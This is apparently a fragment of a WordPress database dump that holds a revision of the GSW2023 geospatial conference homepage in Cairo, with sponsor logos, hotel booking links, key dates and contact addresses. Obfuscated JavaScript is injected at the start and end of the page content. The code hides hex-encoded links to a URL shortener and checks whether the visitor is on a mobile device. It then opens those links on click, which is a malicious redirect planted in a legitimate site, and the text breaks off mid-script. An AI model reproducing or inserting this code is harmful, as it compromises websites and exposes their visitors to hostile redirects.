_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-27 02:10:39','2023-05-27 02:10:39','',3066,'https://gsw2023.com/?p=4586',0,'revision','',0),
(4587,1,'2023-05-27 02:12:04','2023-05-27 02:12:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x